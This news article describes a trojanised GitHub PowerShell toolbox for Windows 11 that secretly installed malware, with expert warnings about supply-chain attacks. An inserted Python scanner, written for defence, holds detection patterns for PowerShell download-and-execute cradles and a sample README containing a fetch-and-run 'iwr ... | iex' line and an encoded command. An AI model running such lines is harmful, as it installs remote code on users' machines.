Key Takeaways
- A malicious tool pushed malware under the guise of simplifying the installation of Android apps in Windows.
- The tool worked as advertised, so it didn't raise any red flags.
- Experts advise people to handle any software downloaded from third-party sites with the utmost care.
Just because the code of open source software is available for anyone to see doesn't mean that everyone is looking at it.
Taking advantage of this, hackers co-opted a third-party Windows 11 ToolBox script to distribute malware. On the surface, the app works as advertised and helps add the Google Play Store to Windows 11. Behind the scenes, however, it also infected the computers it ran on with all kinds of malware.
"If there is any kind of advice that could be taken from this, it's that grabbing code to run off the internet demands extra scrutiny," John Hammond, Senior Security Researcher at Huntress, told Lifewire via email.
Daylight Robbery
One of the most anticipated features of Windows 11 was its ability to run Android apps directly from within Windows. However, when the feature was finally released, people were restricted to installing a handful of curated apps from the Amazon App Store and not the Google Play Store as people had hoped.
There was some respite, since the Windows Subsystem for Android allowed people to sideload apps with the help of Android Debug Bridge (adb), in essence allowing the installation of any Android app in Windows 11.
Apps soon started appearing on GitHub, such as the Windows Subsystem for Android Toolbox, which simplified installing any Android app in Windows 11. One such app, called Powershell Windows Toolbox, also offered this ability along with several other options, for instance removing bloat from a Windows 11 installation, tweaking it for performance, and more.
However, while the app worked as advertised, the script was secretly running a series of obfuscated, malicious PowerShell scripts to install a trojan and other malware.
The script's code was open source, but before anyone bothered to look at its code and spot the obfuscated code that downloaded the malware, the script had clocked hundreds of downloads. And since the script worked as advertised, nobody noticed that anything was amiss.
Using the example of 2020's SolarWinds campaign, which infected multiple government agencies, Garret Grajek, CEO of YouAttest, opined that hackers have figured out that the best way to get malware onto our computers is to have us install it ourselves.
"Be it through purchased products like SolarWinds or through open source, if the hackers can get their code into 'legitimate' software, they can save the effort and expense of exploiting zero-day hacks and looking for vulnerabilities," Grajek told Lifewire via email.
Nasser Fattah, North America Steering Committee Chair at Shared Assessments, added that in the case of the Powershell Windows Toolbox, the trojan malware delivered on its promise but had a hidden cost.
"Good trojan malware is one that provides all the capabilities and functions that it advertises it does … plus more (malware)," Fattah told Lifewire via email.
Fattah also pointed out that the project's use of a Powershell script was the first sign that spooked him. "We need to be very cautious of running any Powershell scripts from the internet. Hackers have and will continue to leverage Powershell to distribute malware," warned Fattah.
Hammond concurs. Perusing the documentation of the project, which has now been taken offline by GitHub, he says that the suggestion to start a command interface with administrative privileges and run a line of code that fetches and runs code from the Internet is what set off the warning bells for him.
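The pattern Hammond describes can be checked mechanically before anything is pasted into a terminal. The following is an added example, not code from the article or from the project it discusses; the regular expressions, the function name `review_instructions`, and the sample README are assumptions constructed for illustration.

```python
import re

# Heuristic patterns (assumptions of this example, not taken from the article).
# A PowerShell line that both downloads content and executes it is a "cradle".
DOWNLOAD = re.compile(
    r"\b(?:iwr|irm|curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b"
    r"|DownloadString|DownloadFile|Net\.WebClient", re.I)
EXECUTE = re.compile(
    r"\b(?:iex|Invoke-Expression)\b|\|\s*(?:powershell|pwsh|cmd)\b", re.I)
# -e / -enc / -EncodedCommand followed by a base64-looking argument.
ENCODED = re.compile(r"(?<![\w-])-e(?:nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I)
# Instructions that ask the reader to elevate first.
ELEVATE = re.compile(r"run as administrator|-Verb\s+RunAs|administrative", re.I)


def review_instructions(text):
    """Return [(line_number, [reasons])] for risky install steps in text."""
    elevated = bool(ELEVATE.search(text))
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        reasons = []
        if DOWNLOAD.search(line) and EXECUTE.search(line):
            reasons.append("download-and-execute")
        if ENCODED.search(line):
            reasons.append("encoded-command")
        if reasons and elevated:
            # The same document also asks for an admin shell: higher impact.
            reasons.append("runs-elevated")
        if reasons:
            findings.append((number, reasons))
    return findings


# Constructed sample README; the URL and base64 value are placeholders.
SAMPLE_README = """\
## Install (constructed sample)
1. Open PowerShell and choose "Run as administrator".
2. Paste: iwr -useb https://example.invalid/toolbox.ps1 | iex
3. Or: powershell -NoProfile -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
4. Review the script first: Get-Content toolbox.ps1
"""

if __name__ == "__main__":
    for number, reasons in review_instructions(SAMPLE_README):
        print(f"line {number}: {', '.join(reasons)}")
```

A match is a prompt to read the fetched script before running it, not proof of malice; plenty of legitimate installers use the same one-liner form.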
Shared Responsibility
David Cundiff, chief security officer at Cyvatar, believes there are several lessons people can learn from this normal-looking software with malicious insides.
"Security is a shared responsibility as described within GitHub's own security approach," pointed out Cundiff. "This means that no one entity should rely completely on a single point of failure in the chain."
Furthermore, he advised that anyone who downloads code from GitHub should keep their eyes peeled for warning signs, adding that the situation will repeat itself if people operate under the assumption that everything will be in order because the software is hosted on a trusted and reputable platform.
"While Github is a reputable code sharing platform, users can share security tools for good, as well as evil," agreed Hammond.